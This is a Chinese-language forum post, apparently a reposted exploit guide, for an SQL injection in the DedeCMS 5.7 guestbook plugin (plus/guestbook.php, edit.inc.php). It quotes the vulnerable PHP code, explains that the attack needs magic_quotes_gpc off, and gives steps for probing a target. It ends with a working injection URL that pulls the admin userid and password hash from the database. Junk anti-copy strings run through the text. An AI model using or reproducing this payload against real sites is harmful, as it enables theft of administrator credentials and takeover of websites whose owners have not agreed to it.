dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7
. L0 l! e; E: {
: u3 o; M0 A5 Q4 ?" _漏洞文件edit.inc.php具体代码：
: q/ v; z7 \, S
0 h- M7 s, ]: U$ w4 P1 q< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  
+ B6 z/ `, c; L
   
* g& e/ w" @& |5 s
! m) i4 S2 S3 b. a) M# |# j" f3 \if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  
) U! o$ I4 B" w5 _, d
else $GUEST_BOOK_POS = "guestbook.php";  

0 a7 @* v: J4 W   

* m: T7 d% Z& k5 X0 g% j3 ~$id = intval($id);  

% o8 j/ H2 D" m- a3 H' R' ]' g# K/ {& T" dif(empty($job)) $job='view';  

0 M' V, t, i# P1 X   
7 B9 E9 n, {) v- ~: q
! i5 ]7 Y* n$ S) `2 T% O+ L+ c$ ^1 R5 _if($job=='del' && $g_isadmin)  
( n2 U& f8 U( K! W% j
{  
& L2 S9 q* S! H( N
) G, y& T, }* F# @( E$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  
' _2 @+ Y! K2 R8 d0 D* G, u5 D/ ]  p3 q
ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  

5 T" K8 u+ _, q( nexit();  

}  

# w. c) k/ R  n, n8 L2 Z- D0 {else if($job=='check' && $g_isadmin)  

{  

% Y1 K' }9 m2 S$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  
; \9 O  Q' z* l1 s& g7 n
ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

- W4 f' n  T% h2 O% G$ d, Cexit();  
; i9 M, X5 \' h& n9 ?
}  

else if($job=='editok')  
- N- r" B# a0 {4 m
{  

$remsg = trim($remsg);  
, {, J) ~+ ?/ }7 P5 z6 b: v
if($remsg!='')  
) a5 Q2 G3 ?+ U- a6 O. y( ]
{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  
4 g: u0 _/ S" f& v$ S6 W
  {! J  c# E0 ^" Z+ R) _if($g_isadmin)  

{  

$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  
2 A% G; E( |3 N
, c! b9 Y: [; O9 N//$remsg <br /><font color=red>管理员回复：</font> }  

else
. J; E3 q5 i# G6 v; D
{  
8 ]9 v2 |/ R- p& B* O5 i
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  

* H! p, ^, m5 h6 F/ c$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  
5 ]9 K! H* A* \8 G5 Y2 i
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
$ f. W. L- q5 T+ x0 ]' m* J
$msg = $oldmsg.$remsg;  
( g) i( k) R" U3 H
$ I6 g/ b" E5 X0 W! @; h}  

}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
7 P7 Q. l/ b) g2 d/ N
& i3 ^1 a) G# g8 n$ _3 Q5 r$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

8 z) L- n& b& G  X5 p! TShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
# z/ ^0 I6 [& Q0 b/ j6 v% |1 @% p5 x
3 x5 n8 G5 m9 _exit();  
9 Q/ W2 ~% F0 a: P* I/ y
}  

//home:www.errs.cc  

if($g_isadmin)  

{  

$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

}  

else
0 Z1 [4 L/ m0 U% J$ \7 |
. m( w2 N% F% ]: m5 q( O% }{  
- [0 p. I; h1 J
% v/ v2 A) A% ]* X, S. X% v$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  
& ~# V! V7 Q; J' h6 C5 }7 y( m
} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

怎么判断是否存在漏洞：
# F7 t( r4 \  y3 }( w先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
; S+ a4 i- e$ V然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
9 T; i4 D  s) f4 W7 K9 E: |访问：

* G) q  V0 x+ r2 ?# J8 xwww.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
% ~) `9 I2 U6 ~) x% y跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证


明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问
5 G1 f3 v% ?! L$ b0 {
www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().
/ u- U' t, `: o
大概利用就是这样，大家有兴趣的多研究下！！
' Y9 ]/ [9 F  V, D% u
7 v+ H" |) y1 M) c最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！

2 D$ V8 {# I( Y9 E- |6 a  Uview sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='